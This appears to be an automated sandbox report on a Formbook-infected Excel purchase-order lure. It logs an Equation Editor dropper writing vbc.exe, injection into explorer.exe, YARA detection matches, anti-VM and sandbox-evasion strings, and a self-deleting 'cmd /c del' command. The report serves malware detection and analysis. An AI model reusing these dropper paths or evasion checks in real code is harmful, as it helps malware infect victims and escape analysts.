Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02936540	7_2_02936540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_029A3A83	7_2_029A3A83
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0299CBA4	7_2_0299CBA4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0297DBDA	7_2_0297DBDA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028EFBD7	7_2_028EFBD7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02917B00	7_2_02917B00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0298F8EE	7_2_0298F8EE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028FC85C	7_2_028FC85C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0291286D	7_2_0291286D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0299098E	7_2_0299098E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028F29B2	7_2_028F29B2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_029069FE	7_2_029069FE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02975955	7_2_02975955
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0297394B	7_2_0297394B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02922E2F	7_2_02922E2F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0290EE4C	7_2_0290EE4C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0298CFB1	7_2_0298CFB1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02962FDC	7_2_02962FDC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02900F3F	7_2_02900F3F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0291DF7C	7_2_0291DF7C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0298FDDD	7_2_0298FDDD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_02920D3B	7_2_02920D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028FCD5B	7_2_028FCD5B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009C277	7_2_0009C277
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009C573	7_2_0009C573
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00088C4B	7_2_00088C4B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00088C50	7_2_00088C50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00082D87	7_2_00082D87
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00082FB0	7_2_00082FB0

Source: EME_PO.47563.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 028EDF5C appears 121 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 0295F970 appears 84 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02933F92 appears 132 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 0293373B appears 245 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 028EE2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A0DF5C appears 123 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A7F970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A53F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A5373B appears 245 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A0E2A8 appears 38 times

Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@9/6@13/8

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$EME_PO.47563.xlsx

Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\CEkWcAdOJKRjisuKnvQHyyvhQA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCCD0.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\explorer.exe

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: EME_PO.47563.xlsx

ReversingLabs: Detection: 37%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, explorer.exe
Source:	Binary string: explorer.pdb source: vbc.exe, 00000005.00000002.2171454972.00000000029A0000.00000040.00000001.sdmp

Source: EME_PO.47563.xlsx

Initial sample: OLE indicators vbamacros = False

Source: EME_PO.47563.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: vbc[1].exe.2.dr, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.2.dr, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.f90000.0.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.f90000.3.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.f90000.0.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.f90000.3.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00219242 push esp; iretd	4_2_00219243
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041606D push ebp; ret	5_2_00416074
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041A8E9 push ebx; iretd	5_2_0041A8EA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041825A push 3788F9D1h; ret	5_2_0041825F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041620F pushad ; iretd	5_2_00416218
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B3F2 push eax; ret	5_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B3FB push eax; ret	5_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B3A5 push eax; ret	5_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B45C push eax; ret	5_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040B53D push eax; iretd	5_2_0040B53F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00414D3E push ss; ret	5_2_00414D6D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004035C8 push CD785CF3h; ret	5_2_004035CD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CDEF push dword ptr [8AC2C068h]; ret	5_2_0041D04D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00A0DFA1 push ecx; ret	5_2_00A0DFB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_028EDFA1 push ecx; ret	7_2_028EDFB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009606D push ebp; ret	7_2_00096074
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009620F pushad ; iretd	7_2_00096218
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009825A push 3788F9D1h; ret	7_2_0009825F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009B3A5 push eax; ret	7_2_0009B3F8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009B3FB push eax; ret	7_2_0009B462
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009B3F2 push eax; ret	7_2_0009B3F8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009B45C push eax; ret	7_2_0009B462
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0008B53D push eax; iretd	7_2_0008B53F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000835C8 push CD785CF3h; ret	7_2_000835CD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0009A8E9 push ebx; iretd	7_2_0009A8EA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00094D3E push ss; ret	7_2_00094D6D

Source: initial sample	Static PE information: section name: .text entropy: 7.47595624405
Source: initial sample	Static PE information: section name: .text entropy: 7.47595624405

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\Public\vbc.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\Names

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: EME_PO.47563.xlsx

Stream path 'EncryptedPackage' entropy: 7.9980105307 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2133084587.0000000002638000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2436, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME8
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL8

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088A0 rdtsc

5_2_004088A0

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 960

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1100	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2680	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2680	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2404	Thread sleep time: -41500s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2884	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3000	Thread sleep time: -38000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMware HDDm
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMWAREHDDm
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMWARE8
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: Cm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
Source: explorer.exe, 00000006.00000000.2148845473.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000002.2346897540.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2148864605.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II8
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: Cm"SOFTWARE\VMware, Inc.\VMware Tools8
Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmp	Binary or memory string: QEMU8
Source: explorer.exe, 00000006.00000000.2148839738.0000000004226000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD01dRom0
Source: explorer.exe, 00000006.00000000.2148839738.0000000004226000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD01
